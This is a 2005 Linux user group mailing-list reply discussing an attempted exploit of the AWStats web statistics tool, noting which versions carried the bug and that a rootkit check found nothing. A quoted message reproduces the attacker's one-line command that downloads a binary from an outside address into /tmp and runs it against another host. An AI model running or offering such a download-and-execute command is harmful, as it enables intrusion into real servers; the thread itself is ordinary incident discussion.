- To: slug@xxxxxxxxxxx
- Subject: Re: [SLUG] not so good ouchstats
- From: Marek Wawrzyczny <marekw1977@xxxxxxxxxxxx>
- Date: Mon, 23 May 2005 09:48:42 +1000
- Reply-to: marekw1977@xxxxxxxxxxxx
- User-agent: KMail/1.8
On Sun, 22 May 2005 13:04, Rob Sharp wrote:
> On Sun, 2005-05-22 at 12:25 +0930, Ryan Verner wrote:
> > On Sun, 2005-05-22 at 12:49 +1000, Rob Sharp wrote:
> > > Ouch! They'd tried to run:
> > >
> > > cd /tmp;rm -f /tmp/c;wget 128.xxx.xxx.xxx/c;chmod +x c;./c
> > > 80.xxx.xxx.xxx 80
> > >
> > > Voytek, how did you notice you'd been exploited?
> >
> > How old is the AWStats that you are running? I thought these remote
> > exploit bugs were squashed ages ago.
> >
> > R
>
> Advanced Web Statistics 6.4 (build 1.810), which I think is the latest.
> I'm pretty sure the exploit failed, chkrootkit came back with nothing,
> and nothing unusual is running. I'm probably just being a bit
> paranoid...
>
> Cheers,
> Rob.
Spoke with the admin guys at work, this bug was "introduced" in 6.1, and is
AFAIK fixed in 6.3, definitely in 6.4.
--
---
Marek Wawrzyczny
-------------------------------------
"Terrorism is the war of the poor,
and, war is terrorism of the rich."
- Peter Ustinov
-------------------------------------
-